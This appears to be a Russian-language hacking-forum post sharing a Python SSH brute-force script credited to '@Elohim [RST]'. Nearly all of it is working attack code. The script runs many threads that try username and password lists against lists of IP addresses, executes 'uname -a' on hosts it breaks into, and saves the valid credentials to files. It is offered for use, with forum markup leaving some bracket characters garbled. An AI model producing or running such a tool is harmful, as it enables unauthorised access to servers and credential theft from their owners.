SSH Brute [Python]

Triton

Well-known member
01.10.2016
58
54
#1
Нашел в сети. Думаю кому-нибудь, да пригодится.
Для просмотра контента необходимо: Войти или зарегистрироваться


Python:
import paramiko, sys, Queue, threading
class SSHBrute(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue   
    def run(self):
        while True:
            ip,user,passwd = self.queue.get()
            self.kraken(ip,user,passwd)
            self.queue.task_done()
      
    def kraken(self,ip,user,passwd):
        try:
            if ip in cracked: return False
      
            if '%user%' in str(passwd):
                passwd = passwd.split("%")***91;0***93; + user + passwd.split("%")***91;2***93;
            if '%User%' in str(passwd):
                pwd = user + passwd.split("%")***91;2***93;
                passwd = passwd.split("%")***91;0***93;+pwd.title()
            if str(passwd) == '%null%':
                passwd = ''
      
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())[/SPOILER]
            ssh.connect(ip, username=user, password=passwd, timeout=35)
            raw.write(ip+' '+user+' '+passwd+'\n')
            raw.flush()
            chan = ssh.get_transport().open_session()
            chan.settimeout(35)
            chan.exec_command('uname -a')
            data = chan.recv(1024)
      
            if len(data) == 0:
                nologs.write(ip+' '+user+' '+passwd+'\n')
                nologs.flush()
                return False
          
            val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
            val.flush()
            cracked.append(ip)
            chan.close()
            ssh.close()
            return True
        except Exception, e:
            if 'uthent' in str(e):
                if dbg == 'bad':
                    bad.write(ip+'\n')
                    bad.flush()
                #print '\r***91;+***93;Tried '+ip+' '+user+' '+passwd+'                 '
                ssh.close()
                return False
            #print ip, str(e)
            ssh.close()
            return False
      
def brutemain():
    if len(sys.argv) < 2:
        print """
    SSH Brute Force Tool
    Author:           @Elohim ***91;RST***93;
    Usage:
       bruter ThreadNumber IpFile UserFile PassFile FilterSwitch*
      *The filter Switch Takes Either the word "bad" or "no".
       If you supply the word bad, it filters in bad.txt only the ips
       which indeed support ssh AUTH and password didn't work"""
        return False
    ThreadNR = int(sys.argv***91;1***93;)
    queue = Queue.Queue(maxsize=20000)
    try:
        i = 0
        for i in range(ThreadNR):
            t = SSHBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception, e:
        print 'Cant start more than',i,'Threads!'
  
    global bad
    global val
    global nologs
    global cracked
    global raw
    cracked = ***91;***93;
    bad = open('bad.txt','w')
    val = open('valid.txt','a')
    nologs = open('nologins.txt','a')
    raw = open('raw.txt','a')
    with open(str(sys.argv***91;2***93;),'rU') as ipf: ips = ipf.read().splitlines()
    with open(str(sys.argv***91;3***93;),'rU') as uf: users = uf.read().splitlines()
    with open(str(sys.argv***91;4***93;),'rU') as pf: passwords = pf.read().splitlines()
    global dbg
    dbg = str(sys.argv***91;5***93;)
 
    try:
        for password in passwords:
            for user in users:
                for ip in ips:
                    queue.put((ip,user,password))
    except:
        pass
  
    queue.join()
if __name__ == "__main__":
    brutemain()
 
Симпатии: Понравилось Vander